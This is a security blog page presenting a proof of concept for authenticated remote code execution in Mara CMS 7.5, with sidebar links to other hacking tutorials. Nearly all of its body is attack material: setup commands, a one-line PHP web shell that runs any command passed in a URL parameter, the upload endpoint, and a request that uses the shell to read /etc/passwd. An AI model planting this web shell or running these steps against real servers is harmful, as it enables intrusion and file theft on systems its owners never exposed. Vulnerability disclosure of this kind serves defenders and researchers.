Sponsored
CVE (POC)

Mara CMS 7.5 Exploit – Remote Code Execution (Authenticated)

Hey Folks, In this tutorial we will show you the (POC) of Mara CMS 7.5 Remote Code Execution (Authenticated) Vulnerability.

About the Vulnerability

Exploit Author : Michele Cisternino (0blio_)
Download : https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
Version : 7.5
Tested on: Ubuntu

Vulnerability Setup

https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
unzip -d /var/www/html/MaraCMS75/ MaraCMS75.zip 
cd /var/www/html/MaraCMS75
chmod 777 *
mv example.htaccess .htaccess
cat > webshell.php
'<?php system($_GET["cmd"]); ?>'

Full Proof of Concept

http://localhost/MaraCMS75/codebase/dir.php?type=filenew
http://localhost/MaraCMS75/img/webshell.php?cmd=cat+/etc/passwd
About the Author
Shubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
Sponsored

Recent Posts

Gau (GetAllUrls) – Find Known and Hidden URL

The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…

3 months ago

Jsluicepp – Burp Extension for JS Secrets – BugBountyTip

Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…

8 months ago

Bypassing Firewalls (WAF) with XSS Payloads

Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…

8 months ago

Termux Cheat Sheet for Hackers

Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…

1 year ago

Cracking the X-Factor in Cybersecurity: How Humans are Protecting the Systems?

Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…

2 years ago

Cariddi – Hidden Endpoint Finder for Bug Hunting

Hey Folks, we are back today after such a long break, but don't worry we…

3 years ago
Sponsored

This website uses cookies.